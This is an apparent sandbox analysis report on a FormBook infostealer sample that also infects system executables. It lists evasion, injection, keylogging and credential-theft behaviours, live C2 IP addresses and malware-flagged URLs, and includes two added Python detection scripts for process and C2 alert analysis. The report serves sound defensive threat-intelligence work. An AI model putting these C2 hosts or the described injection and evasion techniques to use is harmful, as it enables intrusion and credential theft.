
Windows Analysis Report
1SxKeB4u0c.exe

Overview

General Information

Sample name: 1SxKeB4u0c.exe (renamed because the original name is a hash value)
Original sample name: 00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539.exe
Analysis ID: 1588634
MD5: 897ff2a936f11b8f74f56e0c835a2c43
SHA1: 9d55cead9cdcd487df37b4264f4a2483f19c8184
SHA256: 00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1SxKeB4u0c.exe (PID: 2160, cmdline: "C:\Users\user\Desktop\1SxKeB4u0c.exe", MD5: 897FF2A936F11B8F74F56E0C835A2C43)
    • svchost.exe (PID: 3272, image: C:\Windows\SysWOW64\svchost.exe, cmdline: "C:\Users\user\Desktop\1SxKeB4u0c.exe", MD5: 1ED18311E3DA35942DB37D15FA40CC5B). A 32-bit svchost.exe whose parent is the sample and whose recorded command line is the sample's own path rather than a service group; the FormBook Yara matches on its memory (3.2.svchost.exe.420000.0.unpack) show this is the process the payload is injected into.
      • LbtMpScwNRqrVB.exe (PID: 5840, cmdline: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe", MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 6524, cmdline: "C:\Windows\SysWOW64\bitsadmin.exe", MD5: F57A03FA0E654B393BB078D1C60695F3)
          • LbtMpScwNRqrVB.exe (PID: 5960, cmdline: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe", MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2684, cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe", MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 2508, cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe", MD5: C14356FC1BFD5700FA1D54D53D65507C)
  • alg.exe (PID: 1848, cmdline: C:\Windows\System32\alg.exe, MD5: 212514466AE3CEB072CE28C89C73B2D2)
  • cleanup
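The two Sigma hits in this report (Suspicious Process Parents, Uncommon Svchost Parent Process) and the svchost.exe entry above all come down to three checks on process-creation telemetry: a svchost.exe not started by services.exe, a command line that names a different binary than the mapped image (the trace left by a suspended process whose image was replaced), and bitsadmin.exe spawning executables outside C:\Windows. The script below runs those checks over a process list constructed from this report's tree; it is an added example, not part of the Joe Sandbox report or the SigmaHQ rule text, and the heuristics are simplified (production rules carry exclusions such as other legitimate svchost parents). The benign services.exe/svchost.exe pair (PIDs 600/900) is invented as a control.

```python
"""Parent/child and command-line anomaly checks over a constructed process list.
Added example; simplified approximations of the Sigma logic, not the rule text."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the image the loader actually mapped
    cmdline: str    # command line recorded by the process-creation event


SAMPLE = r"C:\Users\user\Desktop\1SxKeB4u0c.exe"
DROPPED = r"C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"

# Constructed from the process tree and Sigma event data in this report, plus one
# invented benign services.exe -> svchost.exe pair (PIDs 600/900) as a control.
SAMPLE_EVENTS = [
    ProcEvent(2160, 0, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(3272, 2160, r"C:\Windows\SysWOW64\svchost.exe", f'"{SAMPLE}"'),
    ProcEvent(5840, 3272, DROPPED, f'"{DROPPED}"'),
    ProcEvent(6524, 5840, r"C:\Windows\SysWOW64\bitsadmin.exe", r'"C:\Windows\SysWOW64\bitsadmin.exe"'),
    ProcEvent(5960, 6524, DROPPED, f'"{DROPPED}"'),
    ProcEvent(2684, 6524, r"C:\Program Files\Mozilla Firefox\Firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(600, 4, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\services.exe"),
    ProcEvent(900, 600, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def find_suspicious(events):
    """Return (pid, reason, detail) tuples for every event that trips a check."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        pname = basename(parent.image) if parent else ""
        # 1. svchost.exe is started by services.exe; any other parent means a
        #    look-alike or a hollowed copy (the report's PID 3272 case).
        if name == "svchost.exe" and pname != "services.exe":
            findings.append((e.pid, "uncommon svchost parent", pname or "<none>"))
        # 2. Command line names a different binary than the mapped image: the
        #    classic residue of CreateProcess(CREATE_SUSPENDED) + image replacement.
        if basename(cmdline_image(e.cmdline)) != name:
            findings.append((e.pid, "image/command-line mismatch", cmdline_image(e.cmdline)))
        # 3. bitsadmin.exe has no legitimate reason to spawn binaries outside C:\Windows.
        if pname == "bitsadmin.exe" and not e.image.lower().startswith("c:\\windows\\"):
            findings.append((e.pid, "bitsadmin spawned non-Windows binary", e.image))
    return findings


if __name__ == "__main__":
    for pid, reason, detail in find_suspicious(SAMPLE_EVENTS):
        print(f"PID {pid}: {reason}: {detail}")
```

On this report's tree the script flags PID 3272 twice (svchost.exe parented by the sample, and a command line pointing at the sample), and PIDs 5960 and 2684 as children of bitsadmin.exe; the control svchost.exe under services.exe is silent.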
No configs have been found
Memory dumps matching Yara rule JoeSecurity_FormBook_1 (description: Yara detected FormBook, author: Joe Security):
  00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp
  00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp
  00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp
  00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp
  00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp
  (3 further entries collapsed in the original report)
Unpacked PE files matching Yara rule JoeSecurity_FormBook_1 (description: Yara detected FormBook, author: Joe Security):
  3.2.svchost.exe.420000.0.unpack
  3.2.svchost.exe.420000.0.raw.unpack

System Summary

Sigma rule match (author: Florian Roth (Nextron Systems)), process started:
  Command / CommandLine: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"
  CommandLine|base64offset|contains: )^
  Image / NewProcessName / OriginalFileName: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
  ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 6524, ParentProcessName: bitsadmin.exe
  ProcessId: 5960, ProcessName: LbtMpScwNRqrVB.exe
Sigma rule match (author: Florian Roth (Nextron Systems)), process started:
  Command / CommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe"
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ParentCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ParentImage: C:\Users\user\Desktop\1SxKeB4u0c.exe, ParentProcessId: 2160, ParentProcessName: 1SxKeB4u0c.exe
  ProcessId: 3272, ProcessName: svchost.exe
Sigma rule match (author: vburov), process started (the same event as the previous entry, matched by a second rule):
  Command / CommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe"
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ParentCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ParentImage: C:\Users\user\Desktop\1SxKeB4u0c.exe, ParentProcessId: 2160, ParentProcessName: 1SxKeB4u0c.exe
  ProcessId: 3272, ProcessName: svchost.exe
Suricata alerts, SID 2050745, severity 1, classtype "Malware Command and Control Activity Detected", protocol TCP (one alert per C2 host contacted):
  Timestamp                        Flow
  2025-01-11T03:29:38.153479+0100  192.168.2.8:49711 -> 161.97.142.144:80
  2025-01-11T03:30:02.244910+0100  192.168.2.8:49716 -> 23.225.160.132:80
  2025-01-11T03:30:36.774129+0100  192.168.2.8:49720 -> 149.88.81.190:80
  2025-01-11T03:31:50.256479+0100  192.168.2.8:49726 -> 85.159.66.93:80
  2025-01-11T03:32:03.584409+0100  192.168.2.8:49730 -> 185.27.134.144:80
  2025-01-11T03:32:17.220453+0100  192.168.2.8:49734 -> 104.21.95.160:80
  2025-01-11T03:32:30.684068+0100  192.168.2.8:49738 -> 188.114.97.3:80
  2025-01-11T03:32:44.250506+0100  192.168.2.8:49742 -> 154.88.22.101:80
  2025-01-11T03:32:57.547399+0100  192.168.2.8:49746 -> 209.74.77.107:80
  2025-01-11T03:33:19.491866+0100  192.168.2.8:49750 -> 104.21.48.1:80
  2025-01-11T03:33:35.521212+0100  192.168.2.8:49754 -> 20.2.249.7:80

Suricata alerts, SID 2018141, severity 1, classtype "A Network Trojan was detected", protocol TCP:
  Timestamp                        Flow
  2025-01-11T03:29:01.710695+0100  54.244.188.177:80 -> 192.168.2.8:49705

Suricata alerts, SID 2037771, severity 1, classtype "A Network Trojan was detected", protocol TCP:
  Timestamp                        Flow
  2025-01-11T03:29:01.710695+0100  54.244.188.177:80 -> 192.168.2.8:49705

Suricata alerts, SID 2855465, severity 1, classtype "A Network Trojan was detected", protocol TCP (the same eleven flows as SID 2050745):
  Timestamp                        Flow
  2025-01-11T03:29:38.153479+0100  192.168.2.8:49711 -> 161.97.142.144:80
  2025-01-11T03:30:02.244910+0100  192.168.2.8:49716 -> 23.225.160.132:80
  2025-01-11T03:30:36.774129+0100  192.168.2.8:49720 -> 149.88.81.190:80
  2025-01-11T03:31:50.256479+0100  192.168.2.8:49726 -> 85.159.66.93:80
  2025-01-11T03:32:03.584409+0100  192.168.2.8:49730 -> 185.27.134.144:80
  2025-01-11T03:32:17.220453+0100  192.168.2.8:49734 -> 104.21.95.160:80
  2025-01-11T03:32:30.684068+0100  192.168.2.8:49738 -> 188.114.97.3:80
  2025-01-11T03:32:44.250506+0100  192.168.2.8:49742 -> 154.88.22.101:80
  2025-01-11T03:32:57.547399+0100  192.168.2.8:49746 -> 209.74.77.107:80
  2025-01-11T03:33:19.491866+0100  192.168.2.8:49750 -> 104.21.48.1:80
  2025-01-11T03:33:35.521212+0100  192.168.2.8:49754 -> 20.2.249.7:80

Suricata alerts, SID 2855464, severity 1, classtype "A Network Trojan was detected", protocol TCP (three flows per host, a few seconds apart):
  Timestamp                        Flow
  2025-01-11T03:29:54.604282+0100  192.168.2.8:49713 -> 23.225.160.132:80
  2025-01-11T03:29:57.198005+0100  192.168.2.8:49714 -> 23.225.160.132:80
  2025-01-11T03:29:59.729424+0100  192.168.2.8:49715 -> 23.225.160.132:80
  2025-01-11T03:30:09.276305+0100  192.168.2.8:49717 -> 149.88.81.190:80
  2025-01-11T03:30:11.823282+0100  192.168.2.8:49718 -> 149.88.81.190:80
  2025-01-11T03:30:14.370041+0100  192.168.2.8:49719 -> 149.88.81.190:80
  2025-01-11T03:30:43.409205+0100  192.168.2.8:49723 -> 85.159.66.93:80
  2025-01-11T03:30:45.950346+0100  192.168.2.8:49724 -> 85.159.66.93:80
  2025-01-11T03:30:48.520763+0100  192.168.2.8:49725 -> 85.159.66.93:80
  2025-01-11T03:31:55.939008+0100  192.168.2.8:49727 -> 185.27.134.144:80
  2025-01-11T03:31:58.520385+0100  192.168.2.8:49728 -> 185.27.134.144:80
  2025-01-11T03:32:01.061440+0100  192.168.2.8:49729 -> 185.27.134.144:80
  2025-01-11T03:32:09.561620+0100  192.168.2.8:49731 -> 104.21.95.160:80
  2025-01-11T03:32:12.141540+0100  192.168.2.8:49732 -> 104.21.95.160:80
  2025-01-11T03:32:14.684573+0100  192.168.2.8:49733 -> 104.21.95.160:80
  2025-01-11T03:32:23.035066+0100  192.168.2.8:49735 -> 188.114.97.3:80
  2025-01-11T03:32:25.594023+0100  192.168.2.8:49736 -> 188.114.97.3:80
  2025-01-11T03:32:28.125662+0100  192.168.2.8:49737 -> 188.114.97.3:80
  2025-01-11T03:32:36.631692+0100  192.168.2.8:49739 -> 154.88.22.101:80
  2025-01-11T03:32:39.172598+0100  192.168.2.8:49740 -> 154.88.22.101:80
  2025-01-11T03:32:41.713395+0100  192.168.2.8:49741 -> 154.88.22.101:80
  2025-01-11T03:32:49.867503+0100  192.168.2.8:49743 -> 209.74.77.107:80
  2025-01-11T03:32:52.445463+0100  192.168.2.8:49744 -> 209.74.77.107:80
  2025-01-11T03:32:55.026836+0100  192.168.2.8:49745 -> 209.74.77.107:80
  2025-01-11T03:33:11.862420+0100  192.168.2.8:49747 -> 104.21.48.1:80
  2025-01-11T03:33:14.400430+0100  192.168.2.8:49748 -> 104.21.48.1:80
  2025-01-11T03:33:16.953921+0100  192.168.2.8:49749 -> 104.21.48.1:80
  2025-01-11T03:33:27.895923+0100  192.168.2.8:49751 -> 20.2.249.7:80
  2025-01-11T03:33:30.440328+0100  192.168.2.8:49752 -> 20.2.249.7:80
  2025-01-11T03:33:32.975054+0100  192.168.2.8:49753 -> 20.2.249.7:80
  2025-01-11T03:33:41.767203+0100  192.168.2.8:49755 -> 156.251.17.224:80

Suricata alerts, SID 2850851, severity 1, classtype "Malware Command and Control Activity Detected", protocol TCP:
  Timestamp                        Flow
  2025-01-11T03:29:02.139160+0100  192.168.2.8:49706 -> 18.141.10.107:80
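Read together, the alert tables show the FormBook check-in cadence rather than a single C2: per destination, SID 2855464 (the POST check-in rule, per the rule names in the Networking section) fires on three flows about 2.5 s apart, then the two GET rules (2050745 and 2855465) fire once on the same flow, and the next host is contacted roughly 13 to 72 s later. FormBook is known to spread its traffic over a list of domains that mixes decoys with the real C2, so a block on any one of these IPs does little; the useful output is the full set of hosts that show the check-in pattern. The script below derives that from a subset of the rows above. It is an added example, not part of the Joe Sandbox report; the alert tuples are copied from the tables, the SID-to-method mapping comes from the rule names, and the 120 s per-host window is an assumption.

```python
"""Group Suricata C2 alerts by destination and extract the per-host check-in
pattern. Added example; the time window is an assumption."""
from collections import defaultdict
from datetime import datetime

# Method implied by each rule name in the report. The two GET rules fire on the
# same flow, so flows are keyed by source port to avoid double counting.
SID_METHOD = {2050745: "GET", 2855465: "GET", 2855464: "POST"}

# Constructed subset of this report's alert rows: (timestamp, SID, source port, destination IP).
ALERTS = [
    ("2025-01-11T03:29:02.139160+0100", 2850851, 49706, "18.141.10.107"),
    ("2025-01-11T03:29:38.153479+0100", 2050745, 49711, "161.97.142.144"),
    ("2025-01-11T03:29:38.153479+0100", 2855465, 49711, "161.97.142.144"),
    ("2025-01-11T03:29:54.604282+0100", 2855464, 49713, "23.225.160.132"),
    ("2025-01-11T03:29:57.198005+0100", 2855464, 49714, "23.225.160.132"),
    ("2025-01-11T03:29:59.729424+0100", 2855464, 49715, "23.225.160.132"),
    ("2025-01-11T03:30:02.244910+0100", 2050745, 49716, "23.225.160.132"),
    ("2025-01-11T03:30:02.244910+0100", 2855465, 49716, "23.225.160.132"),
    ("2025-01-11T03:30:09.276305+0100", 2855464, 49717, "149.88.81.190"),
    ("2025-01-11T03:30:11.823282+0100", 2855464, 49718, "149.88.81.190"),
    ("2025-01-11T03:30:14.370041+0100", 2855464, 49719, "149.88.81.190"),
    ("2025-01-11T03:30:36.774129+0100", 2050745, 49720, "149.88.81.190"),
    ("2025-01-11T03:30:36.774129+0100", 2855465, 49720, "149.88.81.190"),
]


def parse_ts(ts: str) -> datetime:
    # %z accepts the "+0100" form used by the Suricata timestamps above.
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def profile_destinations(alerts):
    """dst IP -> {'GET': ports, 'POST': ports, 'other': ports, 'first': dt, 'last': dt}."""
    prof = defaultdict(lambda: {"GET": set(), "POST": set(), "other": set(),
                                "first": None, "last": None})
    for ts, sid, sport, dst in alerts:
        t = parse_ts(ts)
        p = prof[dst]
        p[SID_METHOD.get(sid, "other")].add(sport)
        if p["first"] is None or t < p["first"]:
            p["first"] = t
        if p["last"] is None or t > p["last"]:
            p["last"] = t
    return dict(prof)


def formbook_checkin_hosts(prof, max_window_s=120):
    """Hosts with at least one POST and one GET check-in flow inside max_window_s,
    ordered by first contact. A GET-only host (161.97.142.144 here) is left out."""
    hits = [d for d, p in prof.items()
            if p["POST"] and p["GET"]
            and (p["last"] - p["first"]).total_seconds() <= max_window_s]
    return sorted(hits, key=lambda d: prof[d]["first"])


def rotation_intervals(prof):
    """(host, seconds since the previous host's first contact), in time order."""
    order = sorted(prof, key=lambda d: prof[d]["first"])
    return [(order[i],
             round((prof[order[i]]["first"] - prof[order[i - 1]]["first"]).total_seconds(), 1))
            for i in range(1, len(order))]


if __name__ == "__main__":
    prof = profile_destinations(ALERTS)
    for dst in sorted(prof, key=lambda d: prof[d]["first"]):
        p = prof[dst]
        span = (p["last"] - p["first"]).total_seconds()
        print(f"{dst:16} POST={len(p['POST'])} GET={len(p['GET'])} other={len(p['other'])} span={span:.1f}s")
    print("check-in hosts:", formbook_checkin_hosts(prof))
    print("rotation:", rotation_intervals(prof))
```

The Expiro alert (SID 2850851, 18.141.10.107) lands in the "other" bucket and is correctly not reported as a FormBook check-in host, which matters here because the sample carries two unrelated families.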

AV Detection

Source: 1SxKeB4u0c.exe, Avira: detected
Source: http://54.244.188.177/U, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2, Avira URL Cloud: Label: malware
Source: http://www.soainsaat.xyz/rum2/, Avira URL Cloud: Label: malware
Source: http://54.244.188.177/L, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/, Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: 1SxKeB4u0c.exe, ReversingLabs: Detection: 86%
Source: 1SxKeB4u0c.exe, Virustotal: Detection: 83%
Source: Yara match, file source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe, Joe Sandbox ML: detected
Source: 1SxKeB4u0c.exe, Joe Sandbox ML: detected
Source: 1SxKeB4u0c.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb, source: 1SxKeB4u0c.exe, 00000000.00000003.1432232486.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: AppVClient.pdbGCTL, source: AppVClient.exe.0.dr
Source: Binary string: ALG.pdbGCTL, source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: AppVClient.pdb, source: AppVClient.exe.0.dr
Source: Binary string: bitsadmin.pdb, source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bitsadmin.pdbGCTL, source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: LbtMpScwNRqrVB.exe, 00000006.00000002.3894269356.000000000013E000.00000002.00000001.01000000.00000005.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750220082.000000000013E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP, source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb, source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Spreading

Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, System file written: C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046445A: GetFileAttributesW, FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046C6D1: FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046C75C: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046EF95: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046F0F2: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046F3F3: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_004637EF: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_00463B12: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe, Code function 0_2_0046BCBC: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
